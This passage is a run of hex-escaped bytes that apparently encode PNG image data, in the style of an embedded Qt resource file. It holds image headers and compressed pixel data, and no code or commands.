x44\\xc3\\xb5\\x74\\x19\\xfd\\xba\\\n\\x60\\x00\\x60\\xc9\\x15\\x3d\\x4c\\x07\\xd8\\x8e\\x08\\x06\\xa1\\x43\\xa9\\xa9\\\n\\xa9\\x54\\xf8\\x41\\x7f\\x4c\\x9b\\x34\\x78\\x55\\x91\\x00\\x00\\x02\\xe1\\x49\\\n\\x44\\x41\\x54\\x46\\xd4\\xa2\\xb5\\x72\\xe5\\x4a\\xbc\\x15\\xf0\\xd3\\x60\\xba\\\n\\x93\\xd5\\xb0\\x1f\\xf8\\x32\\xd7\\x05\\x08\\xfb\\x75\\xc1\\x00\\x40\\xec\\x05\\\n\\x0b\\x3e\\xf9\\xa4\\x82\\xb5\\x7c\\x06\\xa1\\x5d\\xb9\\xb9\\xb9\\xd8\\xc1\\x3f\\\n\\xa6\\x78\\x25\\x5c\\x4c\\x99\\x08\\x83\\xc1\\x40\\xf4\\x43\\x93\\x7b\\xf5\\xb3\\\n\\xc1\\xfd\\x65\\x3b\\x48\\x55\\x0e\\x08\\xfb\\xeb\\x96\\xf6\\x1e\\xff\\xf5\\x58\\\n\\x03\\x9e\\x7e\\xe2\\x3b\\x34\\x36\\x36\\x12\\x8d\\xf6\\x4c\\x2a\\x82\\x90\\x16\\\n\\x3f\\xe8\\x50\\x0c\\xd9\\xae\\xa8\\xa0\\xa0\\x00\\x1b\\x2f\\x1c\\x1d\\xfc\\x05\\\n\\xec\\x91\\xac\\xba\\x4b\\x14\\xec\\x0b\\x44\\x97\\x76\\x68\\x9c\\x3e\\x7d\\x9a\\\n\\x25\\xe8\\x65\\x10\\xda\\x45\\x8b\\x1f\\xb4\\x6a\\x81\\x76\\xc8\\x86\\xec\\xfe\\\n\\x54\\x5a\\x5a\\x8a\\x67\\x6b\\xde\\x96\\xe2\\x52\\xfd\\x4d\\xd4\\xb8\\x04\\xa0\\\n\\xb9\\xb0\\x04\\x41\\xcc\\x90\\xcd\\x20\\x04\\x80\\xda\\xda\\x5a\\x45\\x12\\xf4\\\n\\xf6\\xd4\\xbb\\xd1\\x66\\x44\\x46\\x92\\x73\\x88\\x98\\x4c\\x26\\xc4\\xbc\\xb5\\\n\\x4d\\xca\\x4b\\xf6\\x05\\x22\\x5c\\x01\\xb0\\x65\\xcb\\x5e\\x84\\x06\\x05\\xb1\\\n\\xd6\\xce\\x20\\xb4\\xfb\\x41\\xe7\\xbd\\xd3\\xaa\\x78\\xa1\\xf7\\x4e\\x69\\x46\\\n\\x7c\\x7c\\x12\\xd1\\x72\\xce\\x78\\x35\\x83\\xc4\\xa5\\xbb\\x82\\x68\\x73\\xfc\\\n\\x73\\x7b\\x7f\\x00\\x5e\\xd8\\xf8\\x0a\\xc2\\x59\\x86\\x6c\\x06\\x21\\x40\\x8f\\\n\\x1f\\x74\\x47\\xd0\\x59\\x24\\x25\\xad\\x21\\x5a\\xce\\xa0\\xac\\x64\\x92\\x45\\\n\\xb0\\xf4\\x80\\xee\\xe8\\xed\\x00\\xac\\x7f\\x21\\x07\\xc6\\xf0\\x70\\xd6\\xca\\\n\\x29\\x97\\x2c\\xbb\\x28\\x68\\xc9\\x0f\\xfa\\x92\\xed\\x7d\\x90\\x3c\\xc2\\xf9\\\n\\xda\\xb5\\x6b\\xe8\\x78\\xee\\x51\\x99\\xde\\x1c\\x67\\x9f\\xa8\\xe9\\xb1\\x04\\\n\\xe1\\x54\\xe5\\xd3\\xeb\\x91\\x90\\x90\\xc0\\x5a\\xb8\\x0a\\x44\\x7c\\x53\\xaf\\\n\\xd9\\x6c\\xa6\\x02\\xc0\\x3f\\x9a\\x0f\\x12\\x05\\xd0\\x6a\\xb5\\xe2\\xb7\\x53\\\n\\x27\\xc9\\x57\\x20\\x51\\xb4\\xde\\x0e\\xc0\\xf2\\x85\\x2f\\x32\\x00\\x19\\x84\\\n\\xb7\\x14\\x19\\x19\\xa9\\x78\\x21\\x9f\\xf9\\xfe\\x75\\x14\\x16\\x16\\x12\\xbd\\\n\\x47\\x6c\\x6c\\x2c\\xde\\x9c\\xa5\\xfc\\x8c\\xef\\xee\\xd9\\x8b\\x88\\x6c\\x40\\\n\\x66\\x52\\x29\\x84\\x71\\x71\\x71\\x8a\\xfb\\x41\\x37\\x0f\\x3b\\x46\\x3c\\x69\\\n\\x6d\\x62\\x62\\x22\\xf6\\x07\\x2a\\x3f\\xe1\\xf4\\x46\\xe4\\x6f\\x91\\x96\\x96\\\n\\xc6\\x5a\\x35\\x1b\\x13\\xda\\x95\\x94\\x94\\xa4\\xb8\\x1d\\xed\\xc3\\x47\\x41\\\n\\x7c\\xa7\\x78\\x6a\\x6a\\xea\\xd0\\x16\\xe3\\x25\\x12\\xdb\\x15\\xcf\\x22\\x61\\\n\\xaf\\x86\\xa9\\x14\\x80\\x77\\x16\\x2f\\xc3\\x9f\\x27\\x5d\\x84\\x2d\\xd7\\x48\\\n\\xbc\\x51\\x6e\\xdf\\xbe\\x5d\\x71\\x00\\xb7\\x8c\\x9b\\x07\\xdd\\x1b\\x26\\x06\\\n\\x20\\x8b\\x84\\xb7\\x94\\x9d\\x9d\\x4d\\xfc\\xbc\\xf8\\x5e\\xe3\\xb1\\x33\\xdb\\\n\\x10\\x17\\x17\\x87\\xc7\\x1f\\x7f\\x5c\\xb6\\x53\\x63\\x8b\\x8b\\x8b\\x11\\x7f\\\n\\x70\\x97\\x22\\x2f\\x2d\\xf6\\x82\\x05\\xcf\\x3f\\xff\\x3c\\x16\\x2d\\x5a\\x44\\\n\\xd4\\xf3\\xca\\xa4\\x42\\x08\\x5b\\x5a\\x5a\\xf0\\xfe\\xfb\\xef\\xc3\\xdf\\xbf\\\n\\xef\\xed\\x3a\\xed\\xed\\xed\\xb0\\x58\\x2c\\x30\\x9b\\xcd\\x00\\x80\\x1b\\x37\\\n\\x6e\\xa0\\xbd\\xbd\\x1d\\x6d\\x6d\\x7d\\x67\\x54\\xd3\\x6a\\xb5\\xf0\\xf5\\xf5\\\n\\xc5\\xa8\\x51\\xa3\\xe0\\xef\\xef\\x0f\\xad\\x56\\x8b\\x91\\x23\\x47\\x62\\xd4\\\n\\xa8\\x51\\x08\\x08\\x08\\x80\\xaf\\xaf\\xaf\\x22\\x8d\\xb0\\xa6\\xa6\\x06\\xf7\\\n\\x17\\xac\\xc7\\x33\\x27\\x2f\\x02\\x00\\xd6\\xdf\\x33\\xaa\\xbf\\x4d\\xba\\x2e\\\n\\x6b\\xfa\\x89\\xef\\xe0\\xe7\\xe7\\x87\\x61\\xc3\\x86\\x61\\xc4\\x88\\x11\\x08\\\n\\x0a\\x0a\\x82\\x56\\xab\\xc5\\x1d\\x77\\xdc\\x81\\xc9\\x93\\x27\\x63\\xc2\\x84\\\n\\x09\\x98\\x3c\\x79\\xb2\\xdb\\xd9\\xbf\\x99\\xbc\\x74\\x4c\\xc8\\xc4\\xc4\\xa4\\\n\\xe0\\x98\\x90\\x89\\x89\\x89\\x41\\xc8\\xc4\\xc4\\x20\\x64\\x62\\x62\\x62\\x10\\\n\\x32\\x31\\x31\\x08\\x99\\x98\\x98\\x18\\x84\\x4c\\x4c\\x0c\\x42\\x26\\x26\\x26\\\n\\x06\\x21\\x13\\x13\\x83\\x90\\x89\\x89\\x89\\x41\\xc8\\xc4\\x44\\xad\\xfe\\x3f\\\n\\xb4\\xb2\\xf5\\x7e\\x1f\\x93\\x49\\x91\\x00\\x00\\x00\\x00\\x49\\x45\\x4e\\x44\\\n\\xae\\x42\\x60\\x82\\\n\\x00\\x00\\x0f\\x71\\\n\\x89\\\n\\x50\\x4e\\x47\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0d\\x49\\x48\\x44\\x52\\x00\\\n\\x00\\x00\\x80\\x00\\x00\\x00\\x80\\x10\\x06\\x00\\x00\\x00\\x93\\xae\\xbd\\x88\\\n\\x00\\x00\\x00\\x04\\x67\\x41\\x4d\\x41\\x00\\x00\\xb1\\x8f\\x0b\\xfc\\x61\\x05\\\n\\x00\\x00\\x00\\x20\\x63\\x48\\x52\\x4d\\x00\\x00\\x7a\\x26\\x00\\x00\\x80\\x84\\\n\\x00\\x00\\xfa\\x00\\x00\\x00\\x80\\xe8\\x00\\x00\\x75\\x30\\x00\\x00\\xea\\x60\\\n\\x00\\x00\\x3a\\x98\\x00\\x00\\x17\\x70\\x9c\\xba\\x51\\x3c\\x00\\x00\\x00\\x06\\\n\\x62\\x4b\\x47\\x44\\x00\\x00\\x00\\x00\\x00\\x00\\xf9\\x43\\xbb\\x7f\\x00\\x00\\\n\\x00\\x09\\x70\\x48\\x59\\x73\\x00\\x00\\x01\\x80\\x00\\x00\\x01\\x80\\x00\\x1f\\\n\\xe4\\xcb\\x22\\x00\\x00\\x00\\x07\\x74\\x49\\x4d\\x45\\x07\\xe3\\x01\\x1c\\x0d\\\n\\x10\\x29\\x7b\\x03\\x1b\\x75\\x00\\x00\\x0e\\x60\\x49\\x44\\x41\\x54\\x78\\xda\\\n\\xed\\xdd\\x7b\\x74\\x54\\xd5\\xbd\\x07\\xf0\\xef\\x3e\\x13\\x79\\x25\\x3c\\x94\\\n\\x06\\x02\\xe2\\x3c\\x32\\x89\\x41\\x4c\\x43\\x52\\x10\\x12\\xa8\\x20\\xdc\\x22\\\n\\xb4\\xc1\\x20\\xe1\\x91\\xd2\\xae\\x85\\x1a\\x10\\x29\\x03\\x57\\x8c\\xe5\\xa5\\\n\\x2d\\x2a\\x8d\\x95\\x80\\xe5\\x52\\x20\\x0b\\x44\\xca\\x15\\x95\\x8b\\x31\\xf2\\\n\\x88\\x82\\x88\\x95\\xc4\\xba\\x34\\x3c\\x0a\\x85\\x00\\xe1\\xd1\\x64\\x26\\x93\\\n\\x81\\x40\\x14\\x08\\x84\\x40\\x78\\x24\\x73\\xf6\\xfd\\x63\\x32\\xb9\\x85\\xa5\\\n\\x45\\xf0\\x70\\xf7\\x24\\xf3\\xfd\\xe4\\x8f\\xac\\xac\\xb0\\xf6\\xf9\\xed\\x73\\\n\\x38\\xdf\\xb3\\xcf\\x3e\\x3b\\x67\\x00\\x22\\x22\\x22\\x22\\x22\\x22\\x22\\x22\\\n\\x22\\x22\\x22\\x22\\x22\\x22\\x22\\x22\\x22\\x22\\x22\\x22\\x22\\x22\\x22\\x22\\\n\\x22\\x22\\x22\\x22\\x22\\x22\\x22\\x0a\\x34\\x42\\x75\\x01\\x46\\xb1\\xfa\\xbe\\\n\\xac\\xda\\x0a\\x6f\\x1d\\x7e\\x31\\x62\\x84\\xa8\\xd5\\x46\\x60\\xea\\x90\\x21\\\n\\x58\\x83\\x41\\xb2\\xd8\\x62\\x91\\xeb\\x11\\x86\\xb0\\x88\\x08\\x31\\x14\\xf3\\\n\\x45\\xd6\\x8f\\x7e\\xa4\\xba\\xde\\x40\\x25\\xb7\\x61\\xb6\\x9c\\x75\\xe6\\x8c\\\n\\x18\\x85\\x8b\\xb8\\x58\\x59\\x89\\x25\\x38\\x83\\x33\\x6e\\xb7\\xec\\x2e\\x77\\\n\\x0b\\xf3\\x5f\\xff\\x2a\\x2d\\xa6\\x1d\\xe2\\xf9\\xbc\\xbc\\xb2\\x2b\\x65\\x57\\\n\\xca\\xae\\x94\\x97\\xab\\xae\\x97\\x7e\\x98\\x26\\x1b\\x00\\xf6\\x2a\\xcb\\x74\\\n\\xcb\\xf4\\xa4\\x24\\xb9\\x5d\\xf6\\x17\\x8b\\x5f\\x7b\\x4d\\xcc\\x16\\xbf\\x85\\\n\\x75\\xe0\\x40\\xd5\\x75\\x05\\x8d\\x0a\\xe9\\x42\\x9f\\x82\\x02\\xad\\xb7\\xb6\\\n\\x02\\x03\\xe7\\xcc\\x29\\xf9\\xd2\\xed\\x70\\x3b\\x76\\xed\\x52\\x5d\\x16\\xdd\\\n\\x9a\\x26\\x13\\x00\\xbe\\x2b\\x7c\\x87\\x0e\\xda\\x3b\\xf2\\x2d\\xf9\\xd6\\xca\\\n\\x95\\xe2\\x1d\\xac\\x16\\x6f\\x8d\\x1e\\x0d\\x27\\xca\\xe1\\x16\\x4d\\xa6\\x1f\\\n\\xcd\\x8e\\x1d\\x16\\x58\\xa5\\x44\\xbd\\x74\\xa0\\x3a\\x27\\x47\\xba\\x43\\xe6\\\n\\x68\\xd5\\x93\\x27\\xbb\\x5c\\x2e\\x97\\xcb\\x55\\x5d\\xad\\xba\\x3c\\xfa\\xf7\\\n\\x02\\xfe\\xc4\\xb1\\x2f\\xea\\x96\\x61\\x5f\\x14\\x15\\x25\\xed\\xa6\\xf7\\xbc\\\n\\xf9\\x1f\\x7e\\x28\\x32\\x70\\x17\\x0e\\x3d\\xf0\\x80\\xea\\xba\\xe8\\x3b\\x44\\\n\\xc8\\xdf\\xc8\\xec\\x92\\x12\\xef\\x57\\xda\\x6c\\x91\\x9c\\x92\\xe2\\x86\\x1b\\\n\\x6e\\x1c\\x3d\\xaa\\xba\\x2c\\xfa\\x76\\x01\\x1b\\x00\\x91\\x2b\\xee\\x5d\\x1f\\\n\\xb9\\x22\\x3a\\x1a\\xe6\\x90\\x9d\\x7a\\xcd\\x8e\\x1d\\x62\\x1a\\xde\\x47\\x76\\\n\\xc7\\x8e\\xaa\\xeb\\xa2\\xef\\x47\\x2e\\xc5\\x58\\x38\\xce\\x9e\\x85\\xa7\\x3e\\\n\\x51\\x6b\\x9b\\x94\\xe4\\x9a\\x5c\\x31\\xca\\x35\\xb9\\xa4\\x44\\x75\\x5d\\x74\\\n\\xbd\\x80\\x0b\\x80\\xa8\\x25\\x51\\x4b\\xa2\\x96\\xb4\\x6b\\x27\\x9f\\xaf\\x3b\\\n\\x58\\xdf\\xaa\\xb0\\x10\\x66\\x7c\\x8a\\x3f\\x3e\\xf8\\xa0\\xea\\xba\\xe8\\x36\\\n\\x39\\x64\\x1e\\xdc\\xc7\\x8e\\x79\\x33\\xb4\\x78\\x20\\x31\\xd1\\x37\\x22\\x38\\\n\\x7f\\x5e\\x75\\x59\\xe4\\xa3\\xa9\\x2e\\xe0\\x46\\xfa\\xdd\\x75\\xed\\xea\\xda\\\n\\xad\\x5a\\xc5\\x13\\xbf\\x99\\xc8\\x16\\x23\\x60\\x8d\\x89\\x31\\x0d\\xd6\\x73\\\n\\x90\\xb0\\x7c\\xb9\\xea\\x72\\xe8\\x7a\\x01\\x13\\x00\\xd1\\x3f\\xb5\\x66\\x5b\\\n\\xb3\\xfb\\xf6\\x6d\\x9c\\xdc\\xa3\\xe6\\x25\\x44\\x64\\xa3\\x7d\\x5a\\x9a\\x7d\\\n\\x84\\xb9\\xc2\\x5c\\xd1\\xaf\\x9f\\xea\\x72\\xc8\\x27\\x60\\x02\\xc0\\xfb\\xac\\\n\\xde\\x09\\x8e\\xac\\x2c\\xce\\xea\\x37\\x53\\xfe\\xe3\\xba\\x0d\\x11\\xda\\x73\\\n\\x99\\x99\\xaa\\xcb\\x21\\x1f\\xe5\\x27\\x9a\\xad\\x95\\xad\\x95\\xad\\x95\\xc5\\\n\\xa2\\x0d\\xd0\\xfb\\xc8\\xc4\\xb2\\x32\\x06\\x40\\x70\\xf0\\x3a\\x45\\x39\\xdc\\\n\\x36\\x9b\\x6f\\x4e\\xc0\\xed\\x56\\x5d\\x4f\\xb0\\x0a\\x51\\x5d\\x80\\x58\\x5c\\\n\\x5f\\x23\\x07\\x3f\\xfe\\x38\\x16\\x6a\\x51\\x38\\x7c\\x07\\x4e\\x7c\\x07\\x9e\\\n\\x40\\xba\\xd7\\x0b\\xbb\\x1c\\x8a\\xb9\\x87\\x0e\\xc9\\x7c\\x91\\x2b\\xa7\\x97\\\n\\x94\\xa0\\x37\\xe2\\x11\\x2f\\xa5\\xea\\xfe\\x07\\x8c\\x3d\\xd8\\x8f\\xfd\\x42\\\n\\x88\\xc1\\x72\\x8c\\x58\\x1c\\x1d\\x0d\\xa7\\xd8\\x86\\x79\\xb1\\xb1\\xc8\\xc6\\\n\\x1a\\xac\\x36\\x99\\x8c\\xde\\x9c\\x69\\x91\\xbe\\x5f\\xf4\\x1c\\x3e\\x1c\\x19\\\n\\x88\\x47\\xd1\\xb2\\x65\\xaa\\xbb\\x1f\\xac\\xd4\\x07\\x80\\x7f\\xc9\\x2e\\x00\\\n\\x4c\\x31\\xb0\\xe1\\x2a\\x3c\\x27\\xa7\\x97\\x96\\xe2\\xe7\\xb2\\xbb\\xec\\x9e\\\n\\x96\\xe6\\x7c\\xc0\\xd3\\xdf\\x83\\x7f\\xfc\\x03\\x00\\xb0\\x58\\x75\\xaf\\x03\\\n\\xd8\\x9f\\x7d\\x7b\\xc7\\x6e\\x37\\x9b\\xcd\\xab\\x7a\\xf5\\x92\\x85\\xe2\\x31\\\n\\x6d\\x56\\x4e\\x8e\\xe8\\x87\\xcd\\x58\\x68\\xb7\\x1b\\xb5\\x19\\xd9\\x5d\\x68\\\n\\xfa\\x3b\\x0d\\xc7\\x3d\\x8e\\x01\\xa0\\x8a\\xfa\\x39\\x80\\x3d\\x98\\x2c\\xeb\\\n\\xcd\\x66\\xc3\\xda\\xf3\\x5f\\xf1\\x0b\\x1b\\x4f\\xfc\\x61\\x9e\\x61\\x0d\\x27\\\n\\x3e\\x7d\\x6f\\x4e\\xa7\\xc7\\xe3\\xf1\\xec\\xdd\\x2b\\xfa\\xc9\\x8f\\xf4\\xac\\\n\\xb4\\xb4\\xc6\\xfd\\x6a\\x10\\x51\\x27\\x6b\\x44\\x9c\\xc5\\xa2\\xba\\x9f\\xc1\\\n\\x4e\\x7d\\x00\\x24\\x63\\x8d\\xf8\\xf8\\xde\\x7b\\x8d\\x6a\\x4e\\x76\\x94\\xd3\\\n\\xb0\\xf6\\xe0\\x41\\x9e\\xf8\\xc6\\xf0\\x07\\x01\\x2e\\x4b\\x9b\\x4c\\x2b\\x2e\\\n\\x36\\xaa\\x5d\\xf9\\xa0\\x38\\x20\\x97\\x1b\\x77\\xdc\\xe9\\xf6\\xa8\\x0f\\x80\\\n\\x35\\x38\\x8d\\xa3\\x77\\xdf\\x6d\\x54\\x73\\xa2\\xb3\\x18\\x8b\\xe5\\x4e\\xa7\\\n\\xea\\x6e\\x35\\x3b\\xbd\\xc4\\xdb\\xa2\\xc2\\xb8\\x95\\x7c\\x62\\x0a\\xd6\\x89\\\n\\x1c\\xae\\xec\\x54\\x4d\\x7d\\x00\\x18\\x3c\\xeb\\x2f\\x4f\\xe3\\x09\\xe9\\xd1\\\n\\x75\\xd5\\xdd\\x6a\\x6e\\x0c\\xdf\\xaf\\x7c\\xda\\x13\\x10\\xd4\\x07\\x00\\x11\\\n\\x29\\xc3\\x00\\x20\\x0a\\x62\\x0c\\x00\\xa2\\x20\\xc6\\x00\\x20\\x0a\\x62\\x0c\\\n\\x00\\xa2\\x20\\xc6\\x00\\x20\\x0a\\x62\\x0c\\x00\\xa2\\x20\\xc6\\x00\\x20\\x0a\\\n\\x62\\x0c\\x00\\xa2\\x20\\xc6\\x00\\x20\\x0a\\x62\\x0c\\x00\\xa2\\x20\\xc6\\x00\\\n\\x20\\x0a\\x62\\x0c\\x00\\xa2\\x20\\xc6\\x00\\x20\\x0a\\x62\\x0c\\x00\\xa2\\x20\\\n\\xc6\\x00\\x20\\x0a\\x62\\xca\\x5f\\x0a\\x4a\\xc6\\xf2\\x7f\\xb4\\x9a\\x7e\\xa1\\\n\\xee\\x9e\\xba\\x7b\\x92\\x93\\xf1\\x20\\xb6\\x63\\xfb\\xe0\\xc1\\x62\\x2f\\x52\\\n\\x90\\xd2\\xb3\\x27\\xfe\\x28\\x6b\\x10\\x6a\\xb5\\xca\\x7d\\xe8\\x84\\x90\\x0e\\\n\\x1d\\x44\\xaa\\x78\\x46\\xa4\\xdf\\x75\\xd7\\x4d\\x1b\\x7e\\x19\\x2f\\xe1\\x65\\\n\\xe3\\xeb\\xb5\\xdb\\x2d\\x16\\xab\\x55\\xdd\\xdb\\x99\\xe5\\x06\\xf9\\x86\\x5c\\\n\\x5d\\x57\\x27\\x12\\xf0\\x0d\\xea\\xcf\\x9f\\xc7\\x0b\\xa2\\x2d\\x2e\\xb9\\xdd\\\n\\x72\\x1a\\x4e\\xe2\\xe4\\xfe\\xfd\\x80\\x70\\x08\\x47\\x7e\\xfe\\x5d\\x73\\x5a\\\n\\xa6\\xb7\\x4c\\xdf\\xb2\\xe5\\xd8\\xea\\x63\\xab\\x8f\\xad\\xae\\xa9\\x51\\x55\\\n\\xaf\\xd1\\x18\\x00\\x4d\\x9c\\x6d\\xa3\\x6d\\xa3\\x6d\\xe3\\xfd\\xf7\\x6b\\xf1\\\n\\xde\\xe1\\xf2\\xec\\xac\\x59\\xf2\\xbd\\xba\\xf1\\xf5\\x3b\\x7f\\xf9\\x4b\\xf1\\\n\\xdf\\x28\\x14\\x9f\\xb5\\x69\\xf3\\x2f\\xff\\x34\\x1f\\x05\\x00\\x6c\\xbe\\x97\\\n\\xf0\\x88\\x54\\xd5\\x95\\x07\\x86\\xc6\\x00\\xb4\\x01\\x40\\x78\\x38\\xd6\\xf9\\\n\\xbe\\x8b\\x75\\x00\\xf0\\xd0\\x43\\x80\\xb4\\xc0\\xfa\\xf4\\xd3\\xf5\\x13\\xaf\\\n\\x5c\\xbe\\xaa\\xd5\\xd6\\x46\\xce\\xb4\\xc4\\x59\\x0f\\xac\\x5b\\x87\\xc8\\xfa\\\n\\x97\\xb4\\xc2\\xac\\xac\\xa6\\xfe\\xa1\\xa7\\xbc\\x05\\x68\\x62\\xba\\x65\\x74\\\n\\xcb\\xe8\\x96\\xd1\\xba\\x75\\x64\\xbe\\xa5\\x93\\xf5\\x9b\\xd7\\x5f\\x17\\xba\\\n\\x7e\\x4e\\x3f\\x57\\x5c\\x8c\\x9f\\x89\\x28\\x64\\xa6\\xa7\\x63\\x15\\x0a\\x71\\\n\\xfd\\x89\\x4f\\x46\\x68\\xd8\\xaf\\x62\\x3d\\xaa\\x91\\x32\\x61\\x02\\x92\\x4c\\\n\\xa1\\xde\\xfb\\x8b\\x8b\\xed\\x03\\x2d\\x59\\x96\\xac\\x05\\x0b\\xac\\xb0\\xc2\\\n\\x8a\\x56\\xad\\x54\\x97\\x79\\xab\\x38\\x02\\x68\\x22\\xfc\\x1f\\x97\\x2e\\x96\\\n\\x9b\\x5c\\xde\\x9a\\x0d\\x1b\\x90\\x87\\xd6\\xe8\\x13\\x1b\\x0b\\xe0\\x15\\xbe\\\n\\x58\\xef\\xff\\xdf\\xf5\\xb7\\x4e\\x33\\x66\\x68\\x9f\\xe9\\x6e\\x3c\\xf0\\xf0\\\n\\xc3\\xe6\\x7a\\xf3\\x51\\xf3\\x7f\\xa5\\xa6\\x7a\\x86\\x79\\x86\\x79\\x86\\x9d\\\n\\x3a\\xa5\\xba\\xce\\x9b\\xe1\\x08\\x20\\xc0\\x45\\x2d\\xb1\\x8c\\xb3\\x8c\\x4b\\\n\\x48\\x10\\x53\\x4c\\x97\\xbc\\x91\\x5f\\x7d\\x85\\x8b\\x58\\x26\\xb2\\x63\\x63\\\n\\x55\\xd7\\x45\\xd7\\x13\\xcf\\x88\\x81\\xb8\\x9c\\x98\\x18\\x32\\x40\\x94\\x8a\\\n\\xd2\\xdd\\xbb\\x6d\\x13\\x6d\\x13\\x6d\\x13\\xe3\\xe2\\x54\\xd7\\x75\\x33\\x0c\\\n\\x80\\x00\\xe5\\xbf\\xe2\\xcb\\xe9\\xf2\\xe7\\x78\\x6a\\xdb\\x36\\xd8\\xc4\\xef\\\n\\xc5\\xa4\\xf0\\x70\\xd5\\x75\\xd1\\xbf\\x27\\x7e\\x8c\\x85\\xe2\\xf5\\x6e\\xdd\\\n\\xc4\\x12\\x3d\\x5e\\x8f\\xdf\\xb2\\xc5\\x77\\x6b\\x10\\x11\\xa1\\xba\\xae\\xef\\\n\\xc2\\x00\\x08\\x30\\xfe\\x7b\\x49\\xd1\\xc5\\x14\\xa1\\x4f\\xce\\xcd\\xe5\\x89\\\n\\xdf\\x34\\xf9\\x83\\xc0\\x64\\x97\\x4f\\x60\\xcd\\xe6\\xcd\\xfe\\xb9\\x1b\\xd5\\\n\\x75\\xdd\\x88\\x01\\x10\\x60\\xb4\\x7c\\xd9\\x09\\xdf\\x64\\x66\\x22\\x43\\xfc\\\n\\x0a\\xd6\\x9e\\x3d\\x55\\xd7\\x43\\x3f\\xd8\\xe7\\x78\\xa9\\x57\\xaf\\x96\\x8f\\\n\\x9a\\x52\\x4c\\x29\\xb3\\x67\\xab\\x2e\\xe6\\x46\\x0c\\x80\\x00\\xe1\\x7f\\x9c\\\n\\x87\\x73\\x98\\x2f\\x37\\x3f\\xfb\\xac\\xea\\x7a\\xc8\\x58\\x32\\x0c\\x25\\x28\\\n\\xc9\\xc8\\x08\\xb4\\x5b\\x02\\x06\\x40\\x80\\xf0\\x3f\\xc7\\x17\\x33\\xf1\\x8a\\\n\\x98\\x17\\xc2\\xa7\\x33\\xcd\\x8c\\x78\\x02\\x99\\xe2\\xd5\\xb0\\x30\\xd3\\x11\\\n\\xfd\\x13\\x4c\\x9b\\x3b\\x57\\x75\\x3d\\x7e\\xfc\\x8f\\xa6\\x98\\x7f\\xe5\\x9e\\\n\\x7f\\x01\\xcf\\x1d\\xdf\\xe0\\x8b\\x08\\x45\\xcc\\xa9\\x53\\xc8\\xc7\\x45\\x0c\\\n\\xda\\xb7\\x4f\\x0e\\xc5\\x3c\\x19\\x71\\xe9\\x92\\xea\\xfd\\xa0\\x8a\\x78\\x4d\\\n\\xa6\\x8a\\x4f\\xc3\\xc2\\x30\\x5c\\x74\\xc2\\xae\\x84\\x04\\xac\\x47\\x67\\x78\\\n\\xef\\xdc\\x15\\x5a\\xee\\x14\\x5f\\xa0\\xcb\\xf8\\xf1\\x3d\\x72\\xc3\\xc7\\xf4\\\n\\xc8\\x9d\\x39\\xf3\\xf0\\x98\\xd3\\xb9\\x87\\xc7\\x5c\\xbc\\xa8\\xaa\\xff\\x0c\\\n\\x00\\xc5\\xfc\\x4b\\x76\\xbf\\x65\\xe5\\x9e\\x21\\x64\\x2e\\x46\\x62\\x7a\\x45\\\n\\x85\\x36\\x5c\\xef\\x8a\\xc1\\x53\\xa6\\x94\\xa6\\x1f\\x9f\\xe9\\x8e\\xfb\\xe8\\\n\\x23\\x00\\xc0\\x36\\x29\\xf1\\x2e\\x9e\\x54\\xbd\\x0f\\x14\\xf3\\xf5\\xff\\x30\\\n\\x00\\x68\\x9a\\xbd\\x97\\xb5\\xdc\\x8a\\x94\\x14\\x39\\x43\\x3e\\x06\\x47\\x76\\\n\\xb6\\x78\\x11\\x07\\xb0\\xa5\\x6b\\x57\\xa3\\x36\\x26\\x32\\xb1\\x16\\x2b\\x43\\\n\\x43\\xaf\\xc6\\x86\\x0e\\xac\\x1d\\x90\\x9c\\x0c\\x9c\\x06\\x90\\x93\\xa3\\xaa\\\n\\xf3\\xbc\\x05\\x50\\xad\\x61\\xad\\xbe\\xd1\\xcd\\xfa\\x4f\\x7c\\xf1\\x4a\\x48\\\n\\x99\\xa9\\x20\\x29\\xa9\\xf4\\xe4\\xf1\\x99\\xee\\xb8\\x0f\\x3f\\x6c\\xf8\\xad\\\n\\xb2\\xb5\\xf7\\x81\\x4d\\xd7\\x9d\\x7b\\xdd\\x70\\x63\\xd3\\x26\\xb1\\x2e\\x44\\\n\\x33\\x9d\\x48\\x4c\\x94\\xaf\\x22\\x0e\\xc9\\x27\\x4f\\x1a\\xbe\\xa9\\x43\\x72\\\n\\xaa\\x9c\\x6a\\xfc\\x71\\xbf\\x55\\x0c\\x00\\xc5\\x1a\\xff\\x48\\xc7\\x60\\xfe\\\n\\x2b\\xbe\\x33\\xcf\\x99\\xe7\\xcc\\x3b\\x7e\\x5c\\x75\\x3f\\x9b\\x9a\\xc6\\xfd\\\n\\xd6\\x0d\\x29\\x32\\x7e\\xea\\x54\\xa3\\xdb\\x97\\x53\\x65\\x95\\xe8\\xa3\\xfe\\\n\\x29\\x0f\\x03\\x40\\x31\\xf9\\x24\\x2a\\x51\\x69\\xb3\\x19\\xd6\\x5e\\xc3\\x15\\\n\\xcb\\x77\\xc5\\x6f\\x18\\xea\\xd3\\x6d\\x73\\xfd\\xb4\\xfc\\xe9\\xf2\\xa7\\xf3\\\n\\xf2\\x30\\x0a\\x5f\\xc3\\x54\\x59\\x69\\x54\\xbb\\x62\\x25\\x42\\xa5\\xd3\\xb8\\\n\\xe3\\x7e\\xbb\\x18\\x00\\xaa\\x75\\x91\\x83\\x30\\xac\\x5d\\x3b\\xa3\\x9a\\x13\\\n\\xf3\\xe4\\x5a\\x9c\\x2b\\x2a\\xf2\\xfd\\xc4\\xa1\\xbe\\x31\\x74\\x5d\\xa6\\xca\\\n\\x65\\x70\\xfa\\xf7\\xab\\x01\\xce\\xe3\\x21\\x61\\x6f\\xdf\\x5e\\x75\\xcf\\x18\\\n\\x00\\x8a\\x89\\x38\\x31\\x54\\x0c\\x6a\\xd1\\xc2\\xa8\\xf6\\xe4\\x1c\\xb1\\x41\\\n\\x3e\\xaa\\x6e\\x56\\xb9\\xd9\\x2a\\x11\\x21\\xf2\\xad\\x0b\\x17\\x0c\\x6b\\xaf\\\n\\x8d\\x88\\x81\\xb5\\x65\\x4b\\xd5\\xdd\\x52\\x1f\\x00\\x76\\x58\\x60\\xe0\\x0b\\\n\\x21\\x44\\x38\\xd6\\x08\\xb3\\xa6\\xbe\\x5f\\x44\\x4d\\x80\\xf2\\x13\\x45\\x4e\\\n\\x47\\x5f\\x24\\x57\\x55\\x19\\xd6\\xe0\\x55\\x99\\x89\\xc1\\x51\\x51\\xaa\\xfb\\\n\\x45\\xd4\\x14\\x28\\x0f\\x00\\xf1\\x2e\\x1e\\x96\\x31\\x06\\x3e\\x66\\x71\\x8a\\\n\\x6d\\x98\\x17\\x1